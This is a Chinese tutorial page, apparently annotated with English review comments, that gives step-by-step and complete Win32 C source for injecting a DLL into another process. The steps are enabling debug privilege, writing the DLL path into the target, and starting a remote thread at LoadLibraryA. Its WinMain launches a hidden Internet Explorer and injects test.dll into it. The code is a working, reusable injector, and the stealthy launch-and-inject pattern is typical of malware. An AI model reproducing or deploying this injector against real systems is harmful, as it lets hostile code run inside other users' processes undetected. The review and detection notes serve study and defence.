线程注入dll

/*
 * Calling-convention macros, one per line (the page had them run together on a
 * single line). The Windows SDK headers (windef.h / minwindef.h) already define
 * these same names, so a private copy is redundant and must stay token-identical
 * to the SDK's definitions, or the compiler reports a macro redefinition. The
 * only one the code on this page uses is APIENTRY, on WinMain, and <windows.h>
 * provides that anyway.
 */
#define WINAPI __stdcall
#define CALLBACK __stdcall
#define WINAPIV __cdecl
#define APIENTRY WINAPI
#define APIPRIVATE __stdcall
#define PASCAL __stdcall
/* CreateRemote Thread() LoadLibreary() Thread() VirtualAllocEx()
   线程注入基本步骤
   1.提升权限通常为DEBUG
   2.调用OpenProcess函数打开目标进程,返回进程句柄
   3.申请空间,写入要注入的DLL名,返回内存空间首地址
   4.调用GetProcAddress函数得到LoadLibrary函数地址
   5.调用CreateRemoteThread函数创建并启动线程
   现在逐个解决首先,提升权限 */
/*
 * NOTE(review): this page is a tutorial, not one compilable file. It holds a
 * step-by-step walk-through made of loose fragments (a bare OpenProcess call,
 * `return FALSE;` / `return TRUE;}` outside any function), then a header
 * "fun.h", then the main file that includes it. Line breaks were restored and
 * the original Chinese code comments translated; no code token was changed.
 * Everything here is Win32-only and was evidently built without UNICODE
 * defined (char buffers are passed to GetSystemDirectory/GetCurrentDirectory).
 */

/*
 * Enable the privilege named by `name` (the injector passes SE_DEBUG_NAME) on
 * the current process token. Returns 0 on success, 1 when OpenProcessToken or
 * AdjustTokenPrivileges fails.
 *
 * NOTE(review): a LookupPrivilegeValue failure only prints and falls through,
 * so `luid` is used uninitialized on that path; hToken is never closed; and
 * AdjustTokenPrivileges can return TRUE without actually enabling anything —
 * a caller that needs certainty must also check GetLastError() for
 * ERROR_NOT_ALL_ASSIGNED. The copy inside fun.h below has the same issues.
 */
int EnableDebugPriv(const char * name) // raise the process to DEBUG privilege
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken) ){
        printf("OpenProcessToken error\n");
        return 1;
    }
    if(!LookupPrivilegeValue(NULL,name,&luid)){
        printf("LookupPrivilege error!\n");
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) ){
        printf("AdjustTokenPrivileges error!\n");
        return 1;
    }
    return 0;
}
/* 该函数用于提升进程为DEBUG权限,函数入口为进程名
   2.接下来,得到进程句柄 */
/* Walk-through fragment, not a statement: the complete call is in InjectDll
   below. NOTE(review): PROCESS_ALL_ACCESS is broader than what the later
   VirtualAllocEx/WriteProcessMemory/CreateRemoteThread calls need; least
   privilege would request only the specific rights. */
OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId) // take full access
/* 3.现在就开始向系统申请所需内存空间 */
/* Walk-through fragment: allocate a buffer in the target process and copy the
   DLL path (including its NUL terminator) into it. */
char *pszLibFileRemote;
pszLibFileRemote=(char *)VirtualAllocEx( hRemoteProcess,NULL, lstrlen(DllFullPath)+1,MEM_COMMIT, PAGE_READWRITE);
if(pszLibFileRemote==NULL){
    printf("VirtualAllocEx error\n");
    return FALSE;
}
if(WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void *)DllFullPath,lstrlen(DllFullPath)+1,NULL) == 0){
    printf("WriteProcessMemory error\n");
    return FALSE;
}
/* 在往后就是得到LoadLibraryA 函数地址 */
/* Walk-through fragment: the address is resolved in the injector's own
   kernel32 and reused inside the target, which only works when both processes
   map kernel32 at the same address (same architecture) — not checked anywhere. */
PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");
if(pfnStartAddr == NULL){
    printf("GetProcAddress error\n");
    return FALSE;
}
/* 最后就是启动线程了呵呵 */
/* Walk-through fragment: the remote thread runs LoadLibraryA(pszLibFileRemote). */
if( (hRemoteThread = CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))==NULL){
    printf("CreateRemoteThread error\n");
    return FALSE;
}
return TRUE;
}
/* 以下是完整源代码头文件: */
/* ---- fun.h ----
   NOTE(review): the include guard starts after the #includes, and the header
   defines functions rather than declaring them, so including it from more than
   one translation unit would give duplicate-symbol link errors. Acceptable for
   this two-file sample only. */
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#ifndef FUN_H
#define FUN_H
/*
 * Same function as above, as it appears in fun.h. Returns 0 on success, 1 on
 * failure. Same review points as the first copy: uninitialized `luid` when
 * LookupPrivilegeValue fails, leaked hToken, ERROR_NOT_ALL_ASSIGNED unchecked.
 */
int EnableDebugPriv(const char * name) // raise the process to DEBUG privilege
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    // open the process token
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken) ){
        printf("OpenProcessToken error\n");
        return 1;
    }
    // look up the privilege's locally unique ID
    if(!LookupPrivilegeValue(NULL,name,&luid)){
        printf("LookupPrivilege error!\n");
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    // adjust the process privileges
    if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) ){
        printf("AdjustTokenPrivileges error!\n");
        return 1;
    }
    return 0;
}
/*
 * Load DllFullPath into the process dwRemoteProcessId by creating a thread
 * there whose start routine is kernel32!LoadLibraryA and whose argument is a
 * copy of the path written into that process. Returns TRUE once the thread has
 * been created, FALSE on any failure (the reason is printed to stdout).
 *
 * NOTE(review): every return path after OpenProcess leaks hRemoteProcess, the
 * success path also leaks hRemoteThread, and the remote buffer is never
 * released with VirtualFreeEx; the thread is never waited for, so TRUE does not
 * mean the DLL actually loaded. DllFullPath must be an ANSI string because
 * LoadLibraryA is resolved explicitly. Detection note: a thread created in
 * another process with a kernel32 start address is the textbook indicator that
 * endpoint telemetry (e.g. Sysmon's CreateRemoteThread event) records.
 */
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId) // injection function
{
    HANDLE hRemoteProcess;
    // obtain debug privilege
    if(EnableDebugPriv(SE_DEBUG_NAME)){
        printf("add privilege error");
        return FALSE;
    }
    // open the target process (PROCESS_ALL_ACCESS is more than the calls below need)
    if((hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId))==NULL){
        printf("OpenProcess error\n");
        return FALSE;
    }
    char *pszLibFileRemote;
    // allocate space in the target for the DLL path
    pszLibFileRemote=(char *)VirtualAllocEx( hRemoteProcess,NULL, lstrlen(DllFullPath)+1,MEM_COMMIT, PAGE_READWRITE);
    if(pszLibFileRemote==NULL){
        printf("VirtualAllocEx error\n");
        return FALSE;
    }
    // write the DLL's full path (with its NUL) into that memory
    if(WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void *)DllFullPath,lstrlen(DllFullPath)+1,NULL) == 0){
        printf("WriteProcessMemory error\n");
        return FALSE;
    }
    // get the address of LoadLibraryA (from this process's kernel32; assumes the target maps it at the same address)
    PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");
    if(pfnStartAddr == NULL){
        printf("GetProcAddress error\n");
        return FALSE;
    }
    HANDLE hRemoteThread;
    // start the remote thread
    if( (hRemoteThread = CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))==NULL){
        printf("CreateRemoteThread error\n");
        return FALSE;
    }
    return TRUE;
}
/*
 * Return the PID of the first running process whose image name equals
 * ProcessName, compared case-insensitively; 0 when none is found or the
 * snapshot cannot be taken.
 *
 * NOTE(review): strupr() upper-cases its argument IN PLACE, and WinMain passes
 * the string literal "iexplore.exe" — writing to a string literal is undefined
 * behaviour (typically a crash on a read-only section). A non-mutating,
 * case-insensitive compare such as _stricmp(pe32.szExeFile, ProcessName)
 * avoids both that and the surprise mutation of the caller's buffer. The early
 * `return` on a match also skips CloseHandle(hProcessSnap), leaking the
 * snapshot handle.
 */
DWORD GetProcessID(char *ProcessName) // get the process PID
{
    PROCESSENTRY32 pe32;
    pe32.dwSize=sizeof(pe32);
    // take a snapshot of all processes in the system
    HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(hProcessSnap==INVALID_HANDLE_VALUE){
        printf("CreateToolhelp32Snapshot error");
        return 0;
    }
    // enumerate the first process in the list
    BOOL bProcess=Process32First(hProcessSnap,&pe32);
    while(bProcess){
        // compare the found process name with the one we want; if equal, return its PID
        if(strcmp(strupr(pe32.szExeFile),strupr(ProcessName))==0)return pe32.th32ProcessID;
        // keep searching
        bProcess=Process32Next(hProcessSnap,&pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}
#endif
/* 主函数文件: */
/* ---- main file ---- */
#include "fun.h"
/*
 * Entry point: launches a hidden iexplore.exe from "<drive>:\Program Files\...",
 * waits two seconds, looks up its PID and injects "<cwd>\test.dll" into it.
 *
 * NOTE(review): neither GetSystemDirectory nor GetCurrentDirectory is checked;
 * Path[3]=0 assumes an "X:\..." result; both strcat calls write into 255-byte
 * buffers with no length check; GetCurrentDirectory yields the working
 * directory, not the executable's directory as the comment says, so test.dll
 * is resolved relative to wherever the program was started; a fixed
 * Sleep(2000) is a race, and a GetProcessID result of 0 is passed straight to
 * InjectDll, whose return value is then ignored. WinExec is a legacy API that
 * Microsoft documents as superseded by CreateProcess.
 */
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    char Path[255];
    char DllPath[255];
    // get the Windows system directory
    GetSystemDirectory(Path,sizeof(Path));
    // truncate with 0x00 to keep only the drive letter ("X:\")
    Path[3]=0x00;
    // build the full path of IE
    strcat(Path,"Program Files\\Internet Explorer\\iexplore.exe");
    // launch IE, in case there is no IE process in the system
    WinExec(Path,SW_HIDE);
    // pause two seconds, wait for IE to start
    Sleep(2000);
    // get the IE process
    DWORD Pid=GetProcessID("iexplore.exe");
    // get the program's own directory (actually the current working directory)
    GetCurrentDirectory(sizeof(DllPath),DllPath);
    // build the DLL's full path
    strcat(DllPath,"\\test.dll");
    // inject into the IE process
    InjectDll(DllPath,Pid);
    return 0;
}
/* 另外有个东西本进程的LoadLibrary 函数地址可以这样获得 */
/* Closing snippet (the page had the type and the variable name run together):
   how the current process's own LoadLibraryA address is obtained. */
PTHREAD_START_ROUTINE p=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("kernel32")),"LoadLibraryA");
/* 该函数成功返回句柄,否则返回零蛋 */